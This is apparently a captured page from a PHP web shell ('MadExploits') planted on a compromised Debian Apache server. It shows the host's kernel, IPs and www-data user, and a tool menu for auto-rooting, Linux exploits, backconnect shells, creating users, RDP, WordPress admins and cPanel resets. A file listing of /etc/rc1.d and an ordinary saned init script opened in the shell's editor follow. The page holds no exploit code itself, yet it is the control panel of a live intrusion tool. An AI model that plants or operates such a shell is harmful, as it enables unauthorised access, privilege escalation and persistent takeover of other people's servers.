Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.139.72.210
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
rc1.d /
[ HOME SHELL ]
Name
Size
Permission
Action
K01apache-htcacheclean
2.43
KB
-rwxr-xr-x
K01apache2
7.99
KB
-rwxr-xr-x
K01atd
1.05
KB
-rwxr-xr-x
K01exim4
6.99
KB
-rwxr-xr-x
K01firewalld
2.25
KB
-rwxr-xr-x
K01irqbalance
2.39
KB
-rwxr-xr-x
K01netfilter-persistent
1.33
KB
-rwxr-xr-x
K01php5.6-fpm
4.19
KB
-rwxr-xr-x
K01php7.0-fpm
4.19
KB
-rwxr-xr-x
K01php7.2-fpm
4.19
KB
-rwxr-xr-x
K01php7.3-fpm
4.19
KB
-rwxr-xr-x
K01php7.4-fpm
4.19
KB
-rwxr-xr-x
K01php8.2-fpm
4.19
KB
-rwxr-xr-x
K01saned
2.17
KB
-rwxr-xr-x
K02mysql
6.06
KB
-rwxr-xr-x
K04rsyslog
2.8
KB
-rwxr-xr-x
K06nfs-common
5.53
KB
-rwxr-xr-x
K06rpcbind
2.42
KB
-rwxr-xr-x
README
369
B
-rw-r--r--
S01killprocs
1.27
KB
-rwxr-xr-x
S02single
592
B
-rwxr-xr-x
S06bootlogs
1.25
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : K01saned
#! /bin/sh # ### BEGIN INIT INFO # Provides: saned # Required-Start: $syslog $local_fs $remote_fs # Required-Stop: $syslog $local_fs $remote_fs # Should-Start: dbus avahi-daemon # Should-Stop: dbus avahi-daemon # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: SANE network scanner server # Description: saned makes local scanners available over the # network. ### END INIT INFO . /lib/lsb/init-functions PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin DAEMON=/usr/sbin/saned NAME=saned DESC="SANE network scanner server" test -x $DAEMON || exit 0 RUN=no RUN_AS_USER=saned # Get lsb functions . /lib/lsb/init-functions # Include saned defaults if available if [ -f /etc/default/saned ] ; then . /etc/default/saned fi DAEMON_OPTS="-a $RUN_AS_USER" set -e case "$1" in start) log_daemon_msg "Starting $DESC" "$NAME" start-stop-daemon --start --quiet --pidfile /var/run/$NAME.pid \ --exec $DAEMON -- $DAEMON_OPTS log_end_msg $? ;; stop) log_daemon_msg "Stopping $DESC" "$NAME" start-stop-daemon --stop --oknodo --quiet --pidfile /var/run/$NAME.pid \ --retry 10 --exec $DAEMON log_end_msg $? ;; force-reload) # check whether $DAEMON is running. If so, restart start-stop-daemon --stop --test --quiet --pidfile \ /var/run/$NAME.pid --exec $DAEMON \ && $0 restart \ || exit 0 ;; restart) log_daemon_msg "Restarting $DESC" "$NAME" $0 stop $0 start ;; status) if [ -s /var/run/$NAME.pid ]; then RUNNING=$(cat /var/run/$NAME.pid) if [ -d /proc/$RUNNING ]; then if [ $(readlink /proc/$RUNNING/exe) = $DAEMON ]; then log_success_msg "$NAME is running" exit 0 fi fi # No such PID, or executables don't match log_failure_msg "$NAME is not running, but pidfile existed" rm /var/run/$NAME.pid exit 1 else rm -f /var/run/$NAME.pid log_failure_msg "$NAME not running" exit 1 fi ;; *) N=/etc/init.d/$NAME log_failure_msg "Usage: $N {start|stop|restart|force-reload}" exit 1 ;; esac
Close